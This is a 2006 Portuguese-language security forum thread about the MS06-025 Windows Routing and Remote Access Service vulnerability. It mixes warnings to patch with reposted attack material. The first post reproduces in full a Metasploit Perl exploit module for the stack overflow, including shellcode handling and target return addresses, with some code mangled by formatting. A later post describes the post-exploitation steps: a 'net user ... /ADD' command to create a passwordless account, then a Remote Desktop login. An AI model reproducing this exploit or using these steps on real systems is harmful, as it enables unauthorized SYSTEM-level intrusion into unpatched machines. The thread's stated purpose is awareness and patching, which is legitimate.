teckV Posted June 28, 2006 at 11:29 AM Report #35218 Posted June 28, 2006 at 11:29 AM anda um exploit do RAS a bombar... ontem fui alvo desse ataque numa maquina que não tinha as ultimas actualizações... esse exploit permite explorar uma vulnerabilidade no "Routing and Remote Access Service" permitindo ao atacante executar codigo remoto com previlegios de SYSTEM e alterar confifuraçãos de serviços RAS e dial-Up connection... é problemático porque está ligado com o "Dial-Up Connections"... veifiquei o ataque quando vi o label de "Found new harware - RAS network adapter"... pelo que percebi estavam a adicionar uma ligação por RAS,"deliguei logo a linha e não econtrei grande coisa nos LOGs anda ppl a efectuar Scans em busca dessa vulnerabilidade É IMPERATIVO QUE ACTUALIZEM O WINDOWS COM A MÁXIMA URGENCIA patch para o XP SP2 http://www.microsoft.com/downloads/details.aspx?familyid=74838e2b-bd5f-4584-81f1-3250e6b69728 links para actualizações/correcções para outras versões/configurações Windows mais info sobre este EXPLOIT http://metasploit.com/projects/Framework/exploits.html#rras_ms06_025'>http://metasploit.com/projects/Framework/exploits.html#rras_ms06_025 http://www.securityfocus.com/bid/18325/discuss o código do exploit... porque acredito na informação.. o exploit já está disponivel publicamente e actualizado na MetaSploit Framework aproveitem para perceber o processo de "exploits" e como funcionam... a melhor forma de o executar é recorrendo à framework MetaSploit The Metasploit Framework is an advanced open-source platform for developingtestingand using exploit code. This project initially started off as a portable network game and has evolved into a powerful tool for penetration testingexploit developmentand vulnerability research.The Framework was written in the Perl scripting language and includes various components written in Cassemblerand Python. The widespread support for the Perl language allows the Framework to run on almost any Unix-like system under its default configuration. A customized Cygwin environment is provided for users of Windows-based operating systems. The project core is dual-licensed under the GPLv2 and Perl Artistic Licensesallowing it to be used in both open-source and commercial projects. http://metasploit.com/projects/Framework/ ## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing licensethis file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::rras_ms06_025; use base "Msf::Exploit"; use strict; use Pex::DCERPC; use Pex::NDR; my $advanced = { 'FragSize' => [ 256'The DCERPC fragment size' ], 'BindEvasion' => [ 0, 'IDS Evasion of the Bind request' ], 'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ], }; my $info = { 'Name' => 'Microsoft RRAS MSO6-025 Stack Overflow', 'Version' => '$Revision: 1.1 $', 'Authors' => [ 'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>', 'H D Moore <hdm [at] metasploit.com>' ], 'Arch' => ['x86'], 'OS' => [ 'win32''win2000''winxp' ], 'Priv' => 1, 'AutoOpts' => { 'EXITFUNC' => 'thread' }, 'UserOpts' => { 'RHOST' => [ 1'ADDR''The target address' ], # SMB connection options 'SMBUSER' => [ 0'DATA''The SMB username to connect with''' ], 'SMBPASS' => [ 0'DATA''The password for specified SMB username',''], 'SMBDOM' => [ 0'DATA''The domain for specified SMB username''' ], 'SMBPIPE' => [ 1'DATA''The pipe name to use (2000=ROUTER, XP=SRVSVC)''ROUTER' ], }, 'Payload' => { 'Space' => 1104, 'BadChars' => "\x00", 'Keys' => ['+ws2ord'], # sub esp4097 + inc esp makes stack happy 'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Description' => Pex::Text::Freeform( qq{ This module exploits a stack overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exea failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1the SMBPIPE option needs to be set to 'SRVSVC'. } ), 'Refs' => [ [ 'BID''18325' ], [ 'CVE''2006-2370' ], [ 'OSVDB''26437' ], [ 'MSB''MS06-025' ] ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Automatic' ], [ 'Windows 2000', 0x7571c1e4 ]# pop/pop/ret [ 'Windows XP SP1'# pop/pop/ret ], 'Keys' => ['rras'], 'DisclosureDate' => 'Jun 13 2006', }; sub new { my ($class) = @_; my $self = $class->SUPER::new( { 'Info' => $info'Advanced' => $advanced }@_ ); return ($self); } sub Exploit { my ($self) = @_; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target = $self->Targets->[$target_idx]; my $FragSize = $self->GetVar('FragSize') || 256; my $target = $self->Targets->[$target_idx]; my ( $res$rpc ); if ( !$self->InitNops(128) ) { $self->PrintLine("[*] Failed to initialize the nop module."); return; } my $pipe = "\\" . $self->GetVar("SMBPIPE"); my $uuid = '20610036-fa22-11cf-9823-00a0c911e5df'; my $version = '1.0'; my $handle = Pex::DCERPC::build_handle( $uuid$version'ncacn_np'$target_host, $pipe ); my $dce = Pex::DCERPC->new( 'handle' => $handle, 'username' => $self->GetVar('SMBUSER'), 'password' => $self->GetVar('SMBPASS'), 'domain' => $self->GetVar('SMBDOM'), 'fragsize' => $self->GetVar('FragSize'), 'bindevasion' => $self->GetVar('BindEvasion'), 'directsmb' => $self->GetVar('DirectSMB'), ); if ( !$dce ) { $self->PrintLine("[*] Could not bind to $handle"); return; } my $smb = $dce->{'_handles'}{$handle}{'connection'}; if ( $target->[0] =~ /Auto/ ) { if ( $smb->PeerNativeOS eq 'Windows 5.0' ) { $target = $self->Targets->[1]; $self->PrintLine('[*] Detected a Windows 2000 target...'); } elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) { $target = $self->Targets->[2]; $self->PrintLine('[*] Detected a Windows XP target...'); } else { $self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() ); return; } } my $pattern = ''; if ($target->[0] =~ /Windows 2000/) { $pattern = pack( 'V'1 ) . pack( 'V'$target->[1] ) . "\xe9\xb7\xfb\xff\xff" ; } elsif( $target->[0] =~ /Windows XP/) { $pattern = pack( 'V'1 ) . pack( 'V'$target->[1] ) . $shellcode; } else { self->PrintLine( '[*] No target available...'); return; } # need to produce an exception my $request = $pattern . Pex::Text::AlphaNumText(0x4000 - length($pattern)); my $len = length ($request); my $stub = Pex::NDR::Long( int( 0x20000 ) ) . Pex::NDR::Long( int( $len ) ) . $request . Pex::NDR::Long( int( $len ) ); $self->PrintLine("[*] Sending request..."); my @response = $dce->request( $handle$stub ); if (@response) { $self->PrintLine('[*] RPC server responded with:'); foreach my $line (@response) { $self->PrintLine( '[*] ' . $line ); } $self->PrintLine('[*] This probably means that the system is patched'); } return; } 1; teckV
UnKnowN Posted June 28, 2006 at 11:54 AM Report #35222 Posted June 28, 2006 at 11:54 AM Nao percebo uma coisa, ao testarmos o exploit usando o Metasploit Framework, estaremos a testar em nós mesmos certo ? :|
Triton Posted June 28, 2006 at 12:34 PM Report #35228 Posted June 28, 2006 at 12:34 PM Exploiting this issue on Microsoft Windows XP SP2 or Windows Server 2003 requires valid login credentials. Anonymous attacks are possible with Windows 2000 and Windows XP versions prior to SP2. Quem tem Windows XP SP2 em princípio não se tem de preocupar, desde que não tenham dado o vosso username e password a ninguém, mas convém sempre instalar o patch, nunca se sabe.. 😉 <3 life
teckV Posted June 28, 2006 at 01:01 PM Author Report #35235 Posted June 28, 2006 at 01:01 PM respondendo aoa isto Nao percebo uma coisa, ao testarmos o exploit usando o Metasploit Framework, estaremos a testar em nós mesmos certo ? :| claro que não.. que sentido fazia ter exploits que só funcionamvam na propria maquina? vê o resto do artigo para perceberes... Quem tem Windows XP SP2 em princípio não se tem de preocupar, desde que não tenham dado o vosso username e password a ninguém, mas convém sempre instalar o patch, nunca se sabe.. cuidado com essas afirmações... todos sabemos o que quer dizer "credenciais validas"... a tua dica está a colocar os utilizadores em grande perigo.. .e apenas porque não entendes nada de segurança... então só se consegue ter um Username e password se alguem vos der?? vamos voltar aquela cena ridicula de que a segurança é uma invenção?? um ataque é um processo complexo e envolve adquirir credenciais válidas... apelo a que tenham cuidado com estas afirmações pois estão a induzir pessoas a erro... e sinceramente não entendo o objectivo de desvalorizar a segurança.. fogo que cena... sabes quantos exploits há que te dão acesso?? sabes o que é preciso para depois de teres uma remote shell criares um acesso valido??? visto que não sabes eu digo-te.. basta o comando... #net user novouser /ADD que cena... não precisam provar nada... não há nada a provar... e caraças pá... é sempre os mesmos.. afirmar coisas ERRADAS é muito mau para a pontuação, se é que me percebes... mais vale estar calado do que pontuar negativamente neste site estão screen shots de ataques com sucesso e mostram as varias fases... http://www.metasploit.com/projects/Framework/screenshots.html saliento esta imagem onde depois de se explorar uma vulnerabilidade se consegue iniciar uma Shell especifica do metasploit... na shell/consola cria-se um user novo sem password.. depois pelo Remote Desktop loga-se na maquina... o resto é com voçes.. imagem da consola onde se defini o alvo quem não percebe de segurança não atrapalhe o trabalho dos outros... please.. não é por nada.. apenas por questões técnicas teckV horus herakty
QuickFire Posted June 28, 2006 at 03:55 PM Report #35272 Posted June 28, 2006 at 03:55 PM Bom post TeckV 😁 Já tive a testar aqui pelos pcs de casa e tão todos protegidos desse exploit 😛 Mas fiquei surpreendido, eu que sou um leigo em segurança, a quantidade de exploits que podem existir para programas especificos 😉
teckV Posted June 28, 2006 at 05:09 PM Author Report #35290 Posted June 28, 2006 at 05:09 PM Já tive a testar aqui pelos pcs de casa e tão todos protegidos desse exploit Mas fiquei surpreendido, eu que sou um leigo em segurança, a quantidade de exploits que podem existir para programas especificos fico muito feliz que o ppl começe a ter consciencia disso... é muito importante para que não acontemçam problemas maiores o objectivo deste POST não foi este ataque especifico... foi mostrar um QUENTE (os tempos de actulização das empresas são grandes e podem encontrar muitas maquinas empresariais vulneraveis) para que o ppl entendesse de uma vez por todas que há varios processos de ataque.. .o CRAKING está em alta... é preciso cuidado usando METODOS e PRATICAS seguras... pela comunidade... como já disse a segurança é de responsabilidade de todos... não é que eu... pois.. .voçes sabem... mas uma coisa é uma coisa e outra coisa é permitir que gajos sem qualquer ideal, motivação filosófica/espiritual e finalidade "humana" espalhem lixo e destruam os srviços que todos usamos e gostamos... resistir é uma coisa... anarquia e chaos é outra... e estas cenas permitem a que gajos revoltados com isto e aquilo lamçem a destuição só por destruição... e poque é que eu me preocupo que as pessoas em casa não sejam atacadas? porque isso vai dar ARMAS, BASES DE APOIO e RAMPAS DE LANÇAMENTO para ataques maiores e mais destuitivos... é por isto que considero um problema colectivo a segurança está muito QUENTE... as técnicas estão muito APURADAS e EVOLUIDAS... a sério... tenham todos os cuidados porque como se diz no "Predador" - merdas aconteçem teckV
bonucci Posted October 26, 2009 at 09:08 PM Report #293469 Posted October 26, 2009 at 09:08 PM Boas, alguem sabeme dizer ond esta localixado a pasta dos exploits e modulos do metasploit 3.2 windows, eu ate ia para o linux que seria mais rapido, mas ja que estou no windows agora, acabava por tentar por aqui
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now